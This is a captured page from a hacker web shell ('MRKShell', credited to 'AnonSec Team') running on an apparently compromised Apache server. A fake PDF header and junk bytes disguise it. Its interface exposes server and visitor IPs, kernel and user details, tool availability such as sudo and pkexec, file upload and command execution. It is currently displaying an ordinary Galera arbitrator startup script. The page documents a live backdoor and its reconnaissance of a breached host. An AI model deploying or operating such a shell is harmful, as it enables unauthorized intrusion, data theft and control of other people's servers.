...........................................................................................................................................................................................................................................................................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%PDF-1.5 MRK IS HERE %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY MR K IS HERE
MRKShell
Server IP : 65.108.66.160  /  Your IP : 216.73.217.50
Web Server : Apache
System : Linux srv16.asso.com.ar 4.18.0-553.123.1.el8_10.x86_64 #1 SMP Tue May 5 04:00:43 EDT 2026 x86_64
User : alasaweborg ( 1047)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/thread-self/root/proc/self/root/usr/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/thread-self/root/proc/self/root/usr/bin/garb-systemd
#!/bin/bash -ue
#

if [[ -f /etc/debian_version ]]; then
    config=/etc/default/garb
else
    config=/etc/sysconfig/garb
fi #

log_failure() {
    echo " ERROR! $@"
}

program_start() {
    echo "Starting garbd"
    /usr/bin/garbd "$@"
}

start() {

    if grep -q -E '^# REMOVE' $config; then
        log_failure "Garbd config $config is not configured yet"
        return 0
    fi

    [ -f $config ] && . $config

    # Check that node addresses are configured
    if [[ -z "${GALERA_NODES:-}" ]]; then
        log_failure "List of GALERA_NODES is not configured"
        return 6
    fi
    if [[ -z "${GALERA_GROUP:-}" ]]; then
        log_failure "GALERA_GROUP name is not configured"
        return 6
    fi

    GALERA_PORT=${GALERA_PORT:-4567}

    OPTIONS="-a gcomm://${GALERA_NODES// /,}"
    # substitute space with comma for backward compatibility

    [ -n "${GALERA_GROUP:-}" ]   && OPTIONS="$OPTIONS -g '$GALERA_GROUP'"
    [ -n "${GALERA_OPTIONS:-}" ] && OPTIONS="$OPTIONS -o '$GALERA_OPTIONS'"
    [ -n "${LOG_FILE:-}" ]       && OPTIONS="$OPTIONS -l '$LOG_FILE'"
    [ -n "${WORK_DIR:-}" ]       && OPTIONS="$OPTIONS -w '$WORK_DIR'"

    eval program_start $OPTIONS
}

# See how we were called.
case "$1" in
    start)
        start
        ;;
    *)
        echo $"Usage: $0 {start}"
        exit 2
        ;;
esac

exit $?

Anon7 - 2022
AnonSec Team